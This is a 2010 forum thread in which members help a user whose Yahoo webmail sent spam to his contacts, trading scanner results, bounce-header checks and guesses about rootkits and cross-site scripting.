Bare Knuckle Pickups Forum
At The Back => Time Out => Topic started by: MDV on May 06, 2010, 03:45:35 PM
-
So, something has caused my email to send a link out to my address book (more or less all of it at least). Likely a virus it seems.
The email doesnt show in my sent folder, and theres a delivery failure notice to 3 presumably dead emails (one of which is swineshead :() at about half 11 today.
Now, my lack of concern for the size or functionality of male genitalia aside (which apparently is what the link was to, I havent clicked it), does this pose a threat to other logins (like online banking and paypal?)
I've run an antivirus (kaspersky), which comes up with the same things as last time, which I thought it had dealt with - two legal keyloggers, one for a game (for some $%&#ing reason) and a trojan, all over 2 weeks old. It doesnt show them as active threats, nor does it show them as disinfected or quarantined. This confuses me. It gives me the option to quarantine them, but just opens my documents folder when I click on it.
Seems either a trojan or a keylogger could do this, but the virus report is quite confusing, plus that these are old and the email hijack was today.
No erroneous payments from my account or paypal. Passwords changed using a virtual keyboard that comes with kaspersky (in case its a keylogger).
Apologies to forum members that recieved a bizarre email from me!
Anybody know anything that can help me determine if my computer is infected and/or other logons at risk, or is it just isolated to my email?
Thanks in advance. Best price on russian sourced male performance enhancement pills to anyone that can help!
Edit - to clarify, virus scans taken today show a 100% clean computer.
-
You are not alone - I regularly get emails from Hohnny Mac just like it , and my girlfriend's AOL account suffered the same hijack.
I would be interested in knowing more about it and what can be done
-
There's a lot of it about.
I have a friend who sent an "I apologise for the funny e-mail" just the other week...
(I didn't get a funny e-mail though!!)
I was talking to his missus last night (actually, she's the friend, she was my best-woman when I got married, he's her other-half)... er, where was I? Oh yeah...
HE (this chap/friend/spouse-of-friend)(his name's Steve, if that helps) is an IT personage, and he's still fighting it... his investigations so far have revealed that it has something to do with facebook...
But, like all IT professionals, he does tend to blame the most obvious "someone else" when things go wrong... (I am an IT professional, of sorts, myself :lol:)
His missus, last night, was saying "He's convinced it's something in his facebook account..." in her very best "the stupid pillock" tone of voice... (she was "Business IT" herself before sprouting sprogs).
BUT - I have a feeling you're anti-facebook like I am MDV?? (so you haven't got an account, and it wouldn't be the issue here).
I think it's "e-mail accounts only" at risk - the idea of beasts like this is to get legit e-mail addresses to send out your bullsh1t for you, bypassing spam-filters.
But... who knows? I'll also be interested in anything else people have got ...
-
I am indeed anti facebook, and dont have an account, or myspace or twitter - the only things that have my account login in them are forums, amazon and a small number of big and as trustworthy as one can hope for suppliers (strings direct, stewmac, allparts, that sort of thing), paypal and the bank. Nothing that I'd think would be suspect.
I've also used this email address for about 5 years without any trouble.
Currently running a max-invasive paranoid security level scan with kaspersky.
-
I'm slighlty suspicious of Amazon anyway out of those (mainly cos it runs like a filthy dog on my laptop and I can see various adware things getting blocked everytime I open an amazon window) - but I'm not sure I'd be that suspicious of any of them... (unless of course you were using one of them on the day that it experienced an attack).
Have you got anything that you allow to use you as a "server"?
Eg. When I joined Spotify (and whenever it updates its client on my pc), my firewall goes "Spotify wants you to act as a server" and I go - "You can f**k right off on that mate..." (well, the button actually says "No", but I've explained to my missus that it's a little more forceful/important than just "No"...)
The first time I thought "oh well, that's it, no spotify for me then", but it works even if you deny this.
It's that sort of thing that I'd suspect, or something that manages to sneak in and pretend it's something else so that your firewall doesn't notice when it starts calling home...
Hopefully if there's anything like that lurking then the scan will spot it.
But I've always assumed that to send e-mail from you, recognisable as coming from you and your ip address... that, unless it's installed some crazy program on your system, a process elsewhere has to take control of your machine and use your e-mail client to send from your e-mail address book... (the fact that you've got nothing in your sent folder made me wonder, but I'm not sure it's that indicative of owt...)
Can you tell from the returned mails whether it was actually coming from your ip? ie from all the tracking guff you get in returned mails. I don't really know how to read them, but I'd be tempted to send a "Testing Testing" e-mail to one of those dead addresses to see whether the return of a legit e-mail from me looks the same as one of these spam-jobs.
-
You are not alone - I regularly get emails from Hohnny Mac just like it , and my girlfriend's AOL account suffered the same hijack.
I would be interested in knowing more about it and what can be done
Yeah, I get bogus "John Mac" emails as well! Very odd.
-
Hard to say if it's isolated to your email or not, viruses can do really nasty things to hide in your system, if you have a single specific target and it's not that hard to make something undetectable if you got the resources. Then it's just a case of getting it inside the target.
In the case of preventing viruses everyone should have firewall, anti virus, Windows/Mac/Linux up to date, web browsers, flash, PDF reader, java up to date too.
Highly recommend PSI secunia, it's a program that checks what needs patching, Microsoft Security Essentials if you want a free easy to use anti virus, if you ain't got a firewall in your OS then there is a free version Zonealarm.
For a bit of security through obscurity I'd change Adobe Reader for Foxit Reader or PDF XChange viewer, also change Internet Explorer for Google Chrome. I use Firefox but market share has gone up yet I can't live without my addons, good addon for Firefox is noscript but it's complex, fiddley, especially when it's a fresh install.
As for facebook, I'm on it, piracy settings at the maximum, absolutely refuse to use any of the third party applications on there. Way too easy for anyone to add an application of dodgy code.
With passwords I use a mix of upper and lower case characters with numbers and symbols, and have different ones for my email and bank
-
Funny you mention chrome - I was using it for about 1 week as my main browser since firefox started having trouble displaying some stuff (pics, flash player vid, menus, all sorts). Never, not once, had a problem with FF.
Rather reminds me of the time I changed to opera for a week, about 4 years ago, and got about 10 viruses.
Uninstalled chrome and did all the other changes in FF, in case it had anything to do with it. Havent used IE in ages.
Thanks for the other advice, I'll look into it (not being totally green on PC security, I have antivirus, firewall (which I now find is off, for no good reason whatsoever! But kasperskys has been on) and dont generally do anything dumb or gullible. Its all very odd.
-
ON Facebook - avoid ALL 3rd party applications - they are a minefield at best
-
Kaspersky defcon level kill-everything-in-sight scan came up blank.
Started windows defender scan.
-
Do you use system restore to keep snapshots of known good states of Windows? I'm not up to speed on Windows admin theses days as I've actively avoided it since 2002 for these very reasons.
-
You are not alone - I regularly get emails from Hohnny Mac just like it , and my girlfriend's AOL account suffered the same hijack.
I would be interested in knowing more about it and what can be done
Yeah, I get bogus "John Mac" emails as well! Very odd.
Sorry about these Jonathan, Philly. I have tried to stop them. It hacked my hotmail account and I know others whop have had the same problem. All Chinese based 'companys'
I think the one i've got just operates from my hotmail account, if that's possible. I've had it go out when using hotmail on my Mac and that's only 8 days old.
-
You are not alone - I regularly get emails from Hohnny Mac just like it , and my girlfriend's AOL account suffered the same hijack.
I would be interested in knowing more about it and what can be done
Yeah, I get bogus "John Mac" emails as well! Very odd.
You must be sh1ting me.... SO DO I! :o
They turn up about twice a month.
That's what we get for being intimate with Johnny Mac and playing with his Koch... "Forum Clap" :(
-
You are not alone - I regularly get emails from Hohnny Mac just like it , and my girlfriend's AOL account suffered the same hijack.
I would be interested in knowing more about it and what can be done
Yeah, I get bogus "John Mac" emails as well! Very odd.
Sorry about these Jonathan, Philly. I have tried to stop them. It hacked my hotmail account and I know others whop have had the same problem. All Chinese based 'companys'
Not a problem, Johnny. I hope to find a use for the cheap Viagra, one day.
-
You are not alone - I regularly get emails from Hohnny Mac just like it , and my girlfriend's AOL account suffered the same hijack.
I would be interested in knowing more about it and what can be done
Yeah, I get bogus "John Mac" emails as well! Very odd.
You must be sh1ting me.... SO DO I! :o
They turn up about twice a month.
That's what we get for being intimate with Johnny Mac and playing with his Koch... "Forum Clap" :(
It's a small price to pay for such a massive Koch!
-
Maybe we should take a leaf out of Dave Gormans book, and just say "yes!" to all the spam... Larger manhoods, better erections, free money from a bloke in Nigeria...
What can possibly go wrong???
-
Maybe we should take a leaf out of Dave Gormans book, and just say "yes!" to all the spam... Larger manhoods, better erections, free money from a bloke in Nigeria...
What can possibly go wrong???
Alas !
I ended up with a 'Manhood' so tumescent, that I could no longer get close enough to the sink and shave. I lost all my mates through looking unkempt - and the bloke from Nigeria never turned up anyway.
I even recently got 'Spam' from B.K.P. offering a range of '7 String pickup covers' - and 550K Pots; I mean, come on - that's not even Standard ... :mrgreen:
-
glad i didn't click that link, then! :lol:
it did seem to be most of your inbox, yeah (at least i assume that's most of your inbox... it was to several people).
i have kaspersky too, but you know as much as i do about using it, it always confuses me as well... :(
have you tried contacting msn/hotmail? i think there's quite a lot of it around, a dude on another forum had a similar thing happen and he sent me a similar email.
if my email starts acting crazy ever, please let me know!
-
Well, I've spoken with my #1 tech advisor dude and he reckons its a rootkit.
I've changed passwords on all my important (i.e. financial) stuff on a different PC (well, laptop) and am using that now with the infected PC disconnected from the net and my network.
Will probably need to wipe the HD to get rid of it....sending out emails is one thing, but rootkits are capable of much more and damned near impossible to remove.
On the plus side, the potential for stuff like this is why I kept my old PC - to protect my audio PC, which is a working machine and not for $%&#ing about with or getting clogged up or infected. That (and this LT) havent been switched on in the problem time, so it should be fine. I hope.
-
glad i didn't click that link, then! :lol:
it did seem to be most of your inbox, yeah (at least i assume that's most of your inbox... it was to several people).
i have kaspersky too, but you know as much as i do about using it, it always confuses me as well... :(
have you tried contacting msn/hotmail? i think there's quite a lot of it around, a dude on another forum had a similar thing happen and he sent me a similar email.
if my email starts acting crazy ever, please let me know!
I suppose theres some sollace in it being so common. Mum was quite confused as to why I'd sent her a link to a viagra site, but said she got the same one from an ex guitarist too.
Hopefully its just an irritation - it hijacks your email and sends this link to as many people as possible, cascading through address books, looking (a little) more trustworthy because its from someone you know, and doesnt try and do anything worse than that. Certain my bank account and paypal have shown no change through the day, and the computer is otherwise behaving normally.
-
One other thing to question, is your email client a piece of software on your machine (Thunderbird etc.) or do you use an online email service like Hotmail? If it's the latter you're at risk from Javascript exploits. I think all the major webmail services (Gmail, Hotmail and Yahoo!) all rely on Javascript to do their thing and Javascript is notoriously hackable. Often you don't even have to click on a link in a maliciously crafted mail, the mere fact of it hitting your account and looking at it can be enough to execute code which is generally the thieving of your address book and subsequent spam. Unfortunately if you rely on webmail there's not much you can do - you have to allow Javascript to get the website to work and Javascript is very bad from a security stand point.
-
Its yahoo, and I'm aware of some of the problems with java (its the only thing that comes up in kaspersky vulnerability scans, at least!), but didnt know it made email hacking that easy.
In your estimation then, do I have malware on that machine (malwarebytes free version now also says its clean, btw) or has some tw@t hacked my address, but my PC and other info are fine?
-
Oh, and will do dave.
This is a pain; at least if some scan could point at something and go 'there it is!' I'd know there was a problem on my machine, with complete certainty - as it is I'm tempted to go with the password changes, the tightening of security on that machine and carry on like its fine, which might well be the worst thing I can do.
-
One other thing to question, is your email client a piece of software on your machine (Thunderbird etc.) or do you use an online email service like Hotmail? If it's the latter you're at risk from Javascript exploits. I think all the major webmail services (Gmail, Hotmail and Yahoo!) all rely on Javascript to do their thing and Javascript is notoriously hackable. Often you don't even have to click on a link in a maliciously crafted mail, the mere fact of it hitting your account and looking at it can be enough to execute code which is generally the thieving of your address book and subsequent spam. Unfortunately if you rely on webmail there's not much you can do - you have to allow Javascript to get the website to work and Javascript is very bad from a security stand point.
This sounds like the culprit!
-
Its yahoo, and I'm aware of some of the problems with java (its the only thing that comes up in kaspersky vulnerability scans, at least!), but didnt know it made email hacking that easy.
In your estimation then, do I have malware on that machine (malwarebytes free version now also says its clean, btw) or has some tw@t hacked my address, but my PC and other info are fine?
Java and Javascript are completely different languages. While the syntax may look the same, they work in entirely different ways.
-
Its yahoo, and I'm aware of some of the problems with java (its the only thing that comes up in kaspersky vulnerability scans, at least!), but didnt know it made email hacking that easy.
In your estimation then, do I have malware on that machine (malwarebytes free version now also says its clean, btw) or has some tw@t hacked my address, but my PC and other info are fine?
Java and Javascript are completely different languages. While the syntax may look the same, they work in entirely different ways.
Errrrr, ok, fine, but if you know the answer to the question, could you answer it, pretty please?
-
It's Java that is being exploited.
-
It's Java that is being exploited.
You sure? My machine itself and other logins under threat?
Password changed, all fixed?
-
Oh, I reinstalled java if that makes any difference.
-
I have my firewall set to warn me if anything is trying to play with Java on my PC...
I choose to block it and stop it dead and have not had an issue since.
And I hang out in some pretty seedy infected areas on this Big Ol' t'internet :?
-
Oh, I reinstalled java if that makes any difference.
If it is a Javascript exploit changing passwords or doing reinstalls etc. won't make any difference and there's no reason why there would be any malicious code on your computer, it's in the email you were sent which lives on your webmail providers server and is executed by your machine when you see the mail.
Your best hope is that your webmail provider improves the security of the Javascript code that makes their site work. You could report your situation to them and it might help them debug their code and track down the vulnerability. Your passwords probably won't matter because these exploits work once you've already logged into your account. I'm afraid that this is a fact of life in this time where so many of us use webmail as our primary email client.
-
I see
Thing is, I didnt open any emails that I didnt expect or werent from trusted sources (no unusual content in those).
The closest I've come is looking at my spam folder, which I dont normally do, but I didnt open any, or dont remember it.
Maybe my memorys playing tricks on me, but I'm 99% sure that there were replies to this spam sent on my account the first time I opened my email today. Does that add up with the java exploit?
-
I see
Thing is, I didnt open any emails that I didnt expect or werent from trusted sources (no unusual content in those).
The closest I've come is looking at my spam folder, which I dont normally do, but I didnt open any, or dont remember it.
Maybe my memorys playing tricks on me, but I'm 99% sure that there were replies to this spam sent on my account the first time I opened my email today. Does that add up with the java exploit?
Could well be. I'm pretty sure that when it happened to me I hadn't clicked on anything either. New vulnerabilities are discovered and exploited all the time. It's a shifting and increasingly sophisticated arms race between hackers and spam merchants and the webmail companies. We're just stuck in the middle.
-
One thing which hasn't been mentioned is that the emails are most likely not originating from your PC. Your address and address book have probably been harvested and emails are being generated elsewhere by a spambot faking you as the sender. There isn't lot you can do about this.
If your IT friend thinks you have a rootkit has he suggested a way to find out? I would scan with http://www.f-secure.com/en_EMEA/security/tools/blacklight/
Rootkits for Win7 are currently rare at the moment, however if you're on XP there are thousands of the buggers!
From an IT security standpoint if you have a Rootkit then I would recommend a format of your system. it's the biggest pain in the arse for sure. BUT you don't know what else the rootkit has dumped on your system some of which could be very new and not known to AV companies yet*
Of course this standpoint is fine for me as I can just network boot a system and have it built in less than 1 hour. Not so easy for a home user which as to dedicate a lot of time getting a system back up and running.
*We send disk images of rootkit infected systems (It's rare we get them TBH) to McAfee our corporate AV vendor for analysis and it's very surprising how much new code they find on these infected systems, hence our don't clean-Re-format policy here!
-
Thanks guys.
There *seems* to be a second email, sent today, as I have a failure notice to several emails, and its the same email, same dodgy link.
Guys on here that got the first one; can you give me a shout if you got a second one please?
See, if there was a second one, the PC that I was using and is suspected infected has been both disconnected (the cable pulled; its a damned clever virus that can circumvent that) and the PC off (even cleverer!!!), and I've been on my laptop. The only connection is they run through the same router. So if theres a second email, the problem isnt my PC (or its, somehow, all my PCs, but it would have to stored on my router, since I havent used my LT in weeks and disconnected the offending PC before firing it up, just in case).
So, anyone get a second spam email off me?
-
Oh, and will do dave.
cheers! hope you get it sorted :)
EDIT: no second one for me.
I also make a point of not even opening an email if i don't know who it's from.
-
Its yahoo, and I'm aware of some of the problems with java (its the only thing that comes up in kaspersky vulnerability scans, at least!), but didnt know it made email hacking that easy.
In your estimation then, do I have malware on that machine (malwarebytes free version now also says its clean, btw) or has some tw@t hacked my address, but my PC and other info are fine?
Java and Javascript are completely different languages. While the syntax may look the same, they work in entirely different ways.
Errrrr, ok, fine, but if you know the answer to the question, could you answer it, pretty please?
Just correcting your lack of knowledge is all. As a scientist I thought you would appreciate someone pointing out misconception, but apparently not. Ho hum.
As mentioned this is most likely happened when some javascript was executed when you used your webmail client to view what was probably an utterly harmless looking mail. I image it's harvested the content of your address book and/or the addresses in the sent mails.
Answer is, don't use a browser to view your mail. If you do, disable javascript. However I suspect that will cripple most of the functionality of the webmail service.
As for if you have a compromised system, who knows? If you're concerned it's probably easier to wipe and restore than it is to spend the hours and hours required to run all the software available, and even then you're not 100% positive that they've picked anything malicious up.
Happy now?
-
:lol: Happier, yeah :lol:
Sort of. I still dont know for sure if I have anything on my system, and dont know how to find out!
I am on windows 7, btw. Also ran a malwarebytes scan and it came up clean. Gonna try backlight and see what happens.
Lets not be making a big deal about the java/javascript thing. I accepted the correction, I just thought it was odd that thats what you chose to tell me.
-
Philp; backlight says that its not compatible with win 7. Trying to run it gives a 'you need admin privileges' message (which is a bit worrying in and of itself given what rootkits do).
Can anyone else that has 7 (preferably 64) try and run it and see if you get the same message please?
Edit - I get the same thing on my LT, which I at least think is clean and is 7-32
-
I'm slighlty suspicious of Amazon anyway out of those (mainly cos it runs like a filthy dog on my laptop and I can see various adware things getting blocked everytime I open an amazon window) - but I'm not sure I'd be that suspicious of any of them... (unless of course you were using one of them on the day that it experienced an attack).
Have you got anything that you allow to use you as a "server"?
Eg. When I joined Spotify (and whenever it updates its client on my pc), my firewall goes "Spotify wants you to act as a server" and I go - "You can f**k right off on that mate..." (well, the button actually says "No", but I've explained to my missus that it's a little more forceful/important than just "No"...)
The first time I thought "oh well, that's it, no spotify for me then", but it works even if you deny this.
It's that sort of thing that I'd suspect, or something that manages to sneak in and pretend it's something else so that your firewall doesn't notice when it starts calling home...
Hopefully if there's anything like that lurking then the scan will spot it.
But I've always assumed that to send e-mail from you, recognisable as coming from you and your ip address... that, unless it's installed some crazy program on your system, a process elsewhere has to take control of your machine and use your e-mail client to send from your e-mail address book... (the fact that you've got nothing in your sent folder made me wonder, but I'm not sure it's that indicative of owt...)
Can you tell from the returned mails whether it was actually coming from your ip? ie from all the tracking guff you get in returned mails. I don't really know how to read them, but I'd be tempted to send a "Testing Testing" e-mail to one of those dead addresses to see whether the return of a legit e-mail from me looks the same as one of these spam-jobs.
Well, I sent an email to swineshead to get a failure notice that I know came from me with the corresponding IP.
It doesnt match the IP in the failure notice from the spam mails.
Can one of the learned IT dude here please interpret this information for me in the virus on my machine Vs yahoo server got hacked and my machines fine hypotheses?
Seems it didnt come from my computer, but rootkits are clever and might mask it, or use a proxy or something?
-
I'm not actually expert enough to interpret properly... but from this, and the posts on here since I wrote that, it does sound to me like your e-mail address and address book details got nicked and the funny mails are not coming from your machine...
So, if that's the case - I spose it's partly "good news"... it sounds like wipe and reformat might be receding as the solution...
But I'd still be left thinking the following:
a) "how the f did it happen?" (so I don't do that again) and
b) "is there any way I can stop these b@stards?".
I have a horrible feeling that there ain't any useful answers to those two questions :(
-
Philp; backlight says that its not compatible with win 7. Trying to run it gives a 'you need admin privileges' message (which is a bit worrying in and of itself given what rootkits do).
Can anyone else that has 7 (preferably 64) try and run it and see if you get the same message please?
Edit - I get the same thing on my LT, which I at least think is clean and is 7-32
On win7 even when you are on as administrator you're not actually running the Admin priv's until you elevate youre account (Right click run as administrator!) If your 'compromised system' is Win7 X64 then I'm gonna stick my neck out and say the chances of you having a rootkit are pretty much zero! The Kernel Patch protection in x64 makes it's very hard to exploit any security holes!
You can use Sopho's free rootkit detector on Win7 64 if you really want http://www.sophos.com/products/free-tools/sophos-anti-rootkit.html
-
Aherm http://m.zdnet.com/blog/security/hacker-exploits-ie8-on-windows-7-to-win-pwn2own/5855
I didn't read it in depth but as any operating system running with any software out there, thre are going to be holes, no matter how secure they claim to be :(
-
Ok, heres the crack so far, summary and all the stuff I've done
- Spam email gets sent from my account to everyone in my address book. No saved email, failure notice ip doesnt match the ip from an email I send from my connection. Email is yahoo.
- Run scans with
-
Stupid restarts. Summary again -
scans with kaspersky, defender (windows stock) and malwarebytes. Clean.
Kaspersky shows a trojan on 18/4. Its the only infection its recorded. It doesnt seem to still be there - I assume it handled it at the time.
AVG scan from my laptop across my network in case running from an OS that an infection isnt trying to hide from helps - no result.
checked ips in failed deliveries - they dont match emails sent from my connection.
Superantispyware showed 9 tracking cookies, nothing major, all gone now.
Sophos showed 2 hidden things, dont know what they are, running again, will give more detail in a minute.
PC slowed down massively last night, to the point where the mouse wouldnt move for 5 seconds at a time. Turned off at the mains, working ok now, never done that before.
Called yahoo, they said that this is happening a fair bit.
Changed all passwords on a different machine
Set up a second email for financial things (also yahoo though - can anyone suggest a more secure way?)
Thoughts? I know what it looks like to me, but I also dont know much about this stuff, when it gets down to it.
-
Sophos results
This $%&#er here
Area: Windows registry
Description: Hidden registry value
Location: \HKEY_USERS\S-1-5-18\Control Panel\International\sShortTime
Removable: No
Notes: (type 1, length 16) "h : m m t t "
And this
Area: Local hard drives
Description: Unknown hidden file
Location: C:\System Volume Information\SystemRestore\New-security.LOG1
Removable: Yes (but clean up not recommended for this file)
Notes: (no more detail available)
-
Sophos results
This $%&#er here
Area: Windows registry
Description: Hidden registry value
Location: \HKEY_USERS\S-1-5-18\Control Panel\International\sShortTime
Removable: No
Notes: (type 1, length 16) "h : m m t t "
And this
Area: Local hard drives
Description: Unknown hidden file
Location: C:\System Volume Information\SystemRestore\New-security.LOG1
Removable: Yes (but clean up not recommended for this file)
Notes: (no more detail available)
Thats fairly standard results for a clean system, you do not have a rootkit on your system!
-
Sophos results
This $%&#er here
Area: Windows registry
Description: Hidden registry value
Location: \HKEY_USERS\S-1-5-18\Control Panel\International\sShortTime
Removable: No
Notes: (type 1, length 16) "h : m m t t "
And this
Area: Local hard drives
Description: Unknown hidden file
Location: C:\System Volume Information\SystemRestore\New-security.LOG1
Removable: Yes (but clean up not recommended for this file)
Notes: (no more detail available)
Thats fairly standard results for a clean system, you do not have a rootkit on your system!
Kickass!
Dont mean to be a dick or anything, just checking source - I assume from your input in this thread that youre a pretty experienced IT dude?
-
Aherm http://m.zdnet.com/blog/security/hacker-exploits-ie8-on-windows-7-to-win-pwn2own/5855
I didn't read it in depth but as any operating system running with any software out there, thre are going to be holes, no matter how secure they claim to be :(
I never said it was impossible I said it was highly unlikely, which I stick by. The hack in the ZDNET link is very very difficult to do and requires a direct attack from someone with extreme skill against a system. Bypassing the DEP like he did would be almost impossible to automate.
Anyway the Sophos results say as expected MDV doesn't have a rootkit, so thats Good news!
:D
-
Kickass!
Dont mean to be a dick or anything, just checking source - I assume from your input in this thread that youre a pretty experienced IT dude?
No problem at all the internet is full of 'experts!' and anyone in IT who claims to know everything and can't be wrong is to be avoided at all costs! I can be wrong but 20 years in IT tells me you don't have a rootkit, there would a a whole ream of hidden reg keys and dll's etc if you did.
I would still try other antimalware products to 100% ensure a clean system however Malwarebytes is well regarded and this has given you a clean bill of health.
This is one part of my job I also look after University wide management and deployment systems.
http://www.northumbria.ac.uk/sd/academic/sobe/bevc/bevcpeople/paitman/
I usually try to avoid giving internet IT advice, it's far to easy to come to a conclusion without access to all of the facts. The user can tell you what they can and believe to be relevant but there's no full picture of issues without actual access to the system either real or via a remote session.
-
Kickass!
Dont mean to be a dick or anything, just checking source - I assume from your input in this thread that youre a pretty experienced IT dude?
No problem at all the internet is full of 'experts!' and anyone in IT who claims to know everything and can't be wrong is to be avoided at all costs! I can be wrong but 20 years in IT tells me you don't have a rootkit, there would a a whole ream of hidden reg keys and dll's etc if you did.
I would still try other antimalware products to 100% ensure a clean system however Malwarebytes is well regarded and this has given you a clean bill of health.
This is one part of my job I also look after University wide management and deployment systems.
http://www.northumbria.ac.uk/sd/academic/sobe/bevc/bevcpeople/paitman/
I usually try to avoid giving internet IT advice, it's far to easy to come to a conclusion without access to all of the facts. The user can tell you what they can and believe to be relevant but there's no full picture of issues without actual access to the system either real or via a remote session.
Sweet, exactly the experience and honesty (that youre not claiming to know for sure, just making the best call you can with the information you have) I hoped to see. Glad youre not offended, too :)
Thanks for your help!
Everyone elses too.
I think I'll hold off my Defcon Level 'Kill it with fire' plan of taking the hard drive out, burning it and putting in a spare I have sitting around!
-
Offended god no! I could have been a random 12 year old girl or 80 year old bloke ;)
I still stand by my comment that any emails people have recieved didn't originate from you but will have had your address as a faked sender, you will see non-delivery reports for bounces but no sent items. It's far to easy to fake the sender address or any other header. It doesn't even need any programing skills.
-
Which is indeed exactly what I saw. I'm not 100% (how could I be; i aint no IT dude - I know just enough about computers to know how much I dont know) but I can come to reasonable, high confidence, if uncertain conclusions with limited evidence (that is my job) and we have
- dodgy email from my account
- delivery failure notice not from my IP
- no sent message log
- Its javascript (did I use it right this time sho' ;) :lol:) webmail
- I rang them and they're having some trouble with it happening on other accounts
- 3 anti-malware programs on the machine and one across a network coming up clean
- rootkit sniffer program giving clean result
- I have since explained the significant drop in performance experienced last night - its a bit of software I've used for years that suddenly decided to make my machine die, so I killed it instead
All of the above are consistent with what you would expect of a commandeering of my account using another computer and nothing ever having been on my machine, many are not consistent with hidden malware (or at least its highly unlikely, like yahoo having more widespread problems with it and the failure notice IPs not being mine) - doesnt prove that nothings there, but I'm quite satisfied that this computer is clean. (edit - occams razor = your friend; simple webmail hijack or nefarious malware-hiding rootkit thats evaded several fully updated and quite effective scans?)
Again, thanks :D
-
I didn't think it was a rootkit either but didn't want to speculate.
Could someone explain this web mail address book nicking in more detail, first I've ever heard of it. Would the javascript in the email be hosted on the web mail server or a 3rd party server? ie is firefox with noscript protecting me or not?
-
I didn't think it was a rootkit either but didn't want to speculate.
Could someone explain this web mail address book nicking in more detail, first I've ever heard of it. Would the javascript in the email be hosted on the web mail server or a 3rd party server? ie is firefox with noscript protecting me or not?
http://en.wikipedia.org/wiki/Cross-site_scripting
XSS being based on javascript code executed on the user's browser, disabling javascript on your browser should prevent the problem - theoretically at least.
-
Cheers! Didn't know cross site scripting could nick address books, I thought it was just for inserting fake login boxes on legit sites (or was that SQL injection?)
Noscript will be protecting me :D
On my Google Chrome suggestion earlier, I think Firefox + Noscript is probably more secure, but it isn't for typical web users, more for control freak nerds